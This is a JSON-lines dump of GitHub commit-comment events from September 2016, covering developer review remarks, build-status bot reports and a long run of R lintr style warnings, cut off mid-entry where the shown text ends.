{"id":"4600834985","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"shminer/android_kernel_lge_g5"},"payload":{"comment":{"id":19125959,"position":null,"line":null,"path":null,"commit_id":"8b952a394f85f2720524743967108988cd54377f","created_at":"2016-09-22T07:30:53Z","updated_at":"2016-09-22T07:30:53Z","body":"I reverted also commits that you told me regarding audio problems during video recording!\r\nDo you think that we need new HAL libraries or we can stay using the old one?\r\n"}},"created_at":"2016-09-22T07:30:53Z"}
{"id":"4600836390","type":"CommitCommentEvent","actor":{"login":"srivasthav89"},"repo":{"name":"srivasthav89/Hello-World-2"},"payload":{"comment":{"id":19125961,"position":null,"line":null,"path":null,"commit_id":"06f57f2ad2a289d5cd56ba4f68eff77ce96eb981","created_at":"2016-09-22T07:31:19Z","updated_at":"2016-09-22T07:31:19Z","body":"done"}},"created_at":"2016-09-22T07:31:19Z"}
{"id":"4600838992","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19125967,"position":null,"line":null,"path":null,"commit_id":"6674c2fc1be12244b80a4887d1f68d0d748eb43e","created_at":"2016-09-22T07:32:02Z","updated_at":"2016-09-22T07:32:02Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-beta.2](http://build.prxm.it:8813/viewLog.html?buildId=3668&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Error running GitVersion Build time: 00:02:44"}},"created_at":"2016-09-22T07:32:02Z"}
{"id":"4600838994","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19125968,"position":null,"line":null,"path":null,"commit_id":"6674c2fc1be12244b80a4887d1f68d0d748eb43e","created_at":"2016-09-22T07:32:02Z","updated_at":"2016-09-22T07:32:02Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-beta.2](http://build.prxm.it:8813/viewLog.html?buildId=3668&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Error running GitVersion Build time: 00:02:44"}},"created_at":"2016-09-22T07:32:02Z"}
{"id":"4600839963","type":"CommitCommentEvent","actor":{"login":"reach2akram"},"repo":{"name":"reach2akram/hello-world"},"payload":{"comment":{"id":19125970,"position":null,"line":null,"path":null,"commit_id":"0b462d19091344d65b4b9a43ad400a1e976d7437","created_at":"2016-09-22T07:32:18Z","updated_at":"2016-09-22T07:32:18Z","body":"commit"}},"created_at":"2016-09-22T07:32:18Z"}
{"id":"4600841706","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19125973,"position":null,"line":null,"path":null,"commit_id":"61eb069da7e627db8bf9851ab34b6ab2020abc96","created_at":"2016-09-22T07:32:48Z","updated_at":"2016-09-22T07:32:48Z","body":"That would suck for current players on the inventory side but if the backpack things work as well that would be a matter of simply buying a newly made one right?"}},"created_at":"2016-09-22T07:32:48Z"}
{"id":"4600841978","type":"CommitCommentEvent","actor":{"login":"ccd0"},"repo":{"name":"nebukazar/OneeChan"},"payload":{"comment":{"id":19125975,"position":8,"line":26,"path":"src/css/Catalog.css","commit_id":"1451db0c2f75902213648d472963f9a817c82576","created_at":"2016-09-22T07:32:53Z","updated_at":"2016-09-22T07:32:53Z","body":"Do you know what this was for?\r\nIt causes serious problems with the new catalog stuff I'm working on, where I'm reusing the `<blockquote>` from the post comment in the catalog (just changing the class name to `comment`), making the `.catalog-thread > .comment` now a `<blockquote>` instead of a `<div>`.\r\n"}},"created_at":"2016-09-22T07:32:53Z"}
{"id":"4600843170","type":"CommitCommentEvent","actor":{"login":"kanghanil"},"repo":{"name":"ljy00ljy/cf_team5"},"payload":{"comment":{"id":19125979,"position":null,"line":null,"path":null,"commit_id":"765010ad9c75865d67a6fc339a23aa00d3a15d33","created_at":"2016-09-22T07:33:13Z","updated_at":"2016-09-22T07:33:13Z","body":"아하하하하"}},"created_at":"2016-09-22T07:33:13Z"}
{"id":"4600844810","type":"CommitCommentEvent","actor":{"login":"ccd0"},"repo":{"name":"nebukazar/OneeChan"},"payload":{"comment":{"id":19125983,"position":8,"line":26,"path":"src/css/Catalog.css","commit_id":"1451db0c2f75902213648d472963f9a817c82576","created_at":"2016-09-22T07:33:41Z","updated_at":"2016-09-22T07:33:41Z","body":"To be specific, only the new version which also applies in the 4chan X catalog has the problem."}},"created_at":"2016-09-22T07:33:41Z"}
{"id":"4600845907","type":"CommitCommentEvent","actor":{"login":"SimenB"},"repo":{"name":"finn-no/eslint-config-finn"},"payload":{"comment":{"id":19125985,"position":5,"line":31,"path":"packages/eslint-config-finn/package.json","commit_id":"684c8b52ff4a8da4df3935dd6c6d1519c70fb082","created_at":"2016-09-22T07:34:00Z","updated_at":"2016-09-22T07:34:00Z","body":"We should enforce here instead of depending on SPT's peer"}},"created_at":"2016-09-22T07:34:00Z"}
{"id":"4600846176","type":"CommitCommentEvent","actor":{"login":"prusswan"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19125986,"position":null,"line":null,"path":null,"commit_id":"530c7c75072ff70e68461a9a2c7636dd0451a354","created_at":"2016-09-22T07:34:04Z","updated_at":"2016-09-22T07:34:04Z","body":"You probably figured it out by now..but to be more specific #5323 "}},"created_at":"2016-09-22T07:34:04Z"}
{"id":"4600846264","type":"CommitCommentEvent","actor":{"login":"luigidellaquila"},"repo":{"name":"orientechnologies/orientdb"},"payload":{"comment":{"id":19125987,"position":5,"line":47,"path":"core/src/main/java/com/orientechnologies/orient/core/iterator/ORecordIteratorClassDescendentOrder.java","commit_id":"12747e0a142160de96694deae5312ce19958e1b2","created_at":"2016-09-22T07:34:06Z","updated_at":"2016-09-22T07:34:06Z","body":"just because `clusterIds` is an `int[]`, and there is no `sort(int[], Comparator)` method on `Arrays` class (there is only `Arrays.sort(T[], Comparator)`, but it cannot be used with int[], weird things of Java generics and auto-boxing)"}},"created_at":"2016-09-22T07:34:06Z"}
{"id":"4600847725","type":"CommitCommentEvent","actor":{"login":"Xitavos"},"repo":{"name":"Xitavos/XitavosCogs"},"payload":{"comment":{"id":19125990,"position":null,"line":null,"path":null,"commit_id":"573a8a597503df3858f9ab7863106be343bfd8fa","created_at":"2016-09-22T07:34:32Z","updated_at":"2016-09-22T07:34:32Z","body":"Now with fewer hard coded channel IDs that I'm sure no one would have abused had they found them :P"}},"created_at":"2016-09-22T07:34:32Z"}
{"id":"4600848344","type":"CommitCommentEvent","actor":{"login":"Gobberwart"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19125992,"position":null,"line":null,"path":null,"commit_id":"530c7c75072ff70e68461a9a2c7636dd0451a354","created_at":"2016-09-22T07:34:42Z","updated_at":"2016-09-22T07:34:42Z","body":"OK, I see. Apparently either some versions of pip, or the setup.sh don't like >=. Changed to == in PR #5606 (merged)"}},"created_at":"2016-09-22T07:34:42Z"}
{"id":"4600853868","type":"CommitCommentEvent","actor":{"login":"ClementVH"},"repo":{"name":"ClementVH/YoutubeDesktop"},"payload":{"comment":{"id":19126006,"position":7,"line":0,"path":"views/index.html","commit_id":"ca26cfc67ee9562057785249a0a00b7d1ed2749d","created_at":"2016-09-22T07:36:14Z","updated_at":"2016-09-22T07:36:14Z","body":"Add mobile web app capable, understand manifest.json to put an icon"}},"created_at":"2016-09-22T07:36:14Z"}
{"id":"4600853887","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19126007,"position":null,"line":null,"path":null,"commit_id":"83800f3c8407b4567361598551c107ec24043279","created_at":"2016-09-22T07:36:14Z","updated_at":"2016-09-22T07:36:14Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.04%25-green.svg)</a>\n"}},"created_at":"2016-09-22T07:36:14Z"}
{"id":"4600854988","type":"CommitCommentEvent","actor":{"login":"michalbrabec"},"repo":{"name":"DEVSENSE/Parsers"},"payload":{"comment":{"id":19126010,"position":12,"line":749,"path":"Source/Devsense.PHP.Parser/Syntax/Generators/PhpLexer.lex","commit_id":"c0cb06bd54e1815b08f39036ab4298ae1e77612b","created_at":"2016-09-22T07:36:31Z","updated_at":"2016-09-22T07:36:31Z","body":"1. Necessary to parse string <<<Test ... just as PHP which outputs the text as one string, we output it as \"<\", \"<\", \"<Test...\"\r\n2. It is necessary to test that all characters are <, checking just the first one would lead to infinite loop"}},"created_at":"2016-09-22T07:36:31Z"}
{"id":"4600856554","type":"CommitCommentEvent","actor":{"login":"vabarca"},"repo":{"name":"vabarca/WittyCloudTest"},"payload":{"comment":{"id":19126013,"position":null,"line":null,"path":null,"commit_id":"5943069d438feb5cec3ac2f54541b4d2b8b0485a","created_at":"2016-09-22T07:36:58Z","updated_at":"2016-09-22T07:36:58Z","body":"You are right!! :-D Fixed at home!! ;-)"}},"created_at":"2016-09-22T07:36:58Z"}
{"id":"4600857436","type":"CommitCommentEvent","actor":{"login":"nshmyrev"},"repo":{"name":"cmusphinx/pocketsphinx"},"payload":{"comment":{"id":19126014,"position":25,"line":1314,"path":"src/libpocketsphinx/pocketsphinx.c","commit_id":"303d7c02589d24b22d7cca7ff25ac45c836aa481","created_at":"2016-09-22T07:37:12Z","updated_at":"2016-09-22T07:37:12Z","body":"@EdwardBX, with simple astar_start the nbest is not initialized, i.e. you do not have a hypothesis assigned. First nbest_next performs first pass of the search, you get the first hypothesis. So you can directly use nbest_hyp on the hypothesis returned."}},"created_at":"2016-09-22T07:37:12Z"}
{"id":"4600858207","type":"CommitCommentEvent","actor":{"login":"peter-mouland"},"repo":{"name":"gaearon/redux-devtools"},"payload":{"comment":{"id":19126016,"position":20,"line":19,"path":"examples/todomvc/index.js","commit_id":"64f58b7010a1b2a71ad16716eb37ac1031f93915","created_at":"2016-09-22T07:37:26Z","updated_at":"2016-09-22T07:37:26Z","body":"I believe you have to turn `routes` into a function `routes()` rather than just a variable. \r\n\r\nHave you also done the whole `<NextApp />` thing?\r\n\r\nsee my own example app with it working [react-lego](https://github.com/peter-mouland/react-lego) in particular the react-hot-loader branch"}},"created_at":"2016-09-22T07:37:26Z"}
{"id":"4600864518","type":"CommitCommentEvent","actor":{"login":"njirap"},"repo":{"name":"andela-aabdulwahab/pilxel"},"payload":{"comment":{"id":19126027,"position":13,"line":13,"path":"django_photo_application/pilxel/tests/test_models.py","commit_id":"d38561c83d31349e413363fb4d0bcaf6bb1ff552","created_at":"2016-09-22T07:39:12Z","updated_at":"2016-09-22T07:39:12Z","body":"we can do away with his"}},"created_at":"2016-09-22T07:39:12Z"}
{"id":"4600865672","type":"CommitCommentEvent","actor":{"login":"ggkrustev"},"repo":{"name":"telerik/kendo-common-tasks"},"payload":{"comment":{"id":19126031,"position":null,"line":null,"path":null,"commit_id":"06a730e32786b676864d85c6cc54b925442ab36f","created_at":"2016-09-22T07:39:32Z","updated_at":"2016-09-22T07:39:32Z","body":"Yeah, right. [Sorry](http://s2.quickmeme.com/img/7e/7e855277a50c5d1d75e4ebe39a638eedf6624af4ce7dc2f7ce846a0be9dc34e4.jpg) for missing that."}},"created_at":"2016-09-22T07:39:32Z"}
{"id":"4600865744","type":"CommitCommentEvent","actor":{"login":"singchan"},"repo":{"name":"silexlabs/Silex"},"payload":{"comment":{"id":19126032,"position":null,"line":null,"path":null,"commit_id":"15bb55bede0d6960d3c99499eb64cdcb71beb73b","created_at":"2016-09-22T07:39:33Z","updated_at":"2016-09-22T07:39:33Z","body":"It is online on preprod.silex.me\nLe 16 sept. 2016 18:03, \"Pylant\" <notifications@github.com> a écrit :\n\n> *your not giving* anyone a link *just codes*\n> show how it will look also , then you have something to really show.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/silexlabs/Silex/commit/15bb55bede0d6960d3c99499eb64cdcb71beb73b#commitcomment-19057886>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGLuWqfbSEjl_t6A-GPFo6sboN77mdV1ks5qqtncgaJpZM4J_Mhv>\n> .\n>\n"}},"created_at":"2016-09-22T07:39:33Z"}
{"id":"4600866539","type":"CommitCommentEvent","actor":{"login":"njirap"},"repo":{"name":"andela-aabdulwahab/pilxel"},"payload":{"comment":{"id":19126033,"position":14,"line":14,"path":"django_photo_application/pilxel/tests/test_models.py","commit_id":"d38561c83d31349e413363fb4d0bcaf6bb1ff552","created_at":"2016-09-22T07:39:47Z","updated_at":"2016-09-22T07:39:47Z","body":"same thing here.."}},"created_at":"2016-09-22T07:39:47Z"}
{"id":"4600870979","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19126039,"position":null,"line":null,"path":null,"commit_id":"0de889850870bc2ed9de0b63fd4310680edaea02","created_at":"2016-09-22T07:40:58Z","updated_at":"2016-09-22T07:40:58Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S, N, I, theta, KDA) {\n^~~~~~~~~~~\n```\n[R/calcSumKDA2.R:4:20:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L4) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  results <- matrix( 0, nrow = s, ncol = 1)\n                   ^\n```\n[R/calcSumKDA2.R:7:28:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​    outcomes <- KDA[numbers+1] + (log(I[i]) * numbers)  -\n                          ~^~\n```\n[R/calcSumKDA2.R:8:7:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n      ^\n```\n[R/calcSumKDA2.R:8:15:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n              ^\n```\n[R/calcSumKDA2.R:8:32:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                               ^\n```\n[R/calcSumKDA2.R:8:50:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                                                 ^\n```\n[R/calcSumKDA2.R:8:52:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                                                   ^\n```\n[R/calcSumKDA2.R:10:19:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    log_max <- max( outcomes )\n                  ^\n```\n[R/calcSumKDA2.R:10:29:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    log_max <- max( outcomes )\n                            ^\n```\n[R/calcSumKDA2.R:11:19:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L11) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    sumlist <- sum( exp(outcomes - log_max) )\n                  ^\n```\n[R/calcSumKDA2.R:11:44:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/calcSumKDA2.R#L11) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    sumlist <- sum( exp(outcomes - log_max) )\n                                           ^\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v, theta_x, theta_y, alpha_x, alpha_y, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:5:27:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/Condition.R:6:27:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/Condition.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:14:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​    b[cnt] = lgamma(I_X[cnt] + I_Y[cnt] + J) - lgamma(I_X[cnt] + I_Y[cnt])\n           ^\n```\n[R/Condition.R:15:17:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L15) *style:* **Use <-, not =, for assignment.**\n```r\n​    poch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt])\n                ^\n```\n[R/Condition.R:16:17:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L16) *style:* **Use <-, not =, for assignment.**\n```r\n​    poch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt])\n                ^\n```\n[R/Condition.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L18) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:21:36:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h <- poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                  ~^~\n```\n[R/Condition.R:21:51:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h <- poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                                 ~^~\n```\n[R/Condition.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:23:16:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n               ^\n```\n[R/Condition.R:23:47:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n                                              ^\n```\n[R/Condition.R:23:51:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n                                                  ^\n```\n[R/Condition.R:24:53:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L24) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (lgamma(theta_x / 2) + lgamma(theta_y / 2) )\n                                                    ^\n```\n[R/Condition.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n         ^\n```\n[R/Condition.R:25:42:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/Condition.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v, model, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:33:3:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L33) *style:* **Variable and function names should be all lowercase.**\n```r\n​  incorrectLength <- 0\n  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:34:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1\n    ^\n```\n[R/Condition.R:34:39:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L34) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:35:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1\n    ^\n```\n[R/Condition.R:35:39:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L35) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:37:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(incorrectLength == 1) { \n    ^\n```\n[R/Condition.R:37:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(incorrectLength == 1) { \n     ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:37:28:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L37) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if(incorrectLength == 1) { \n                           ^\n```\n[R/Condition.R:37:29:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if(incorrectLength == 1) { \n                            ^\n```\n[R/Condition.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tx <- subplex(initVals, g)\n^\n```\n[R/Condition.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L41) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:47:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L50) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:51:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:55:18:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L55) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:55:19:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:56:13:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:56:14:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:56:16:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:56:17:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:58:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:60:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​ 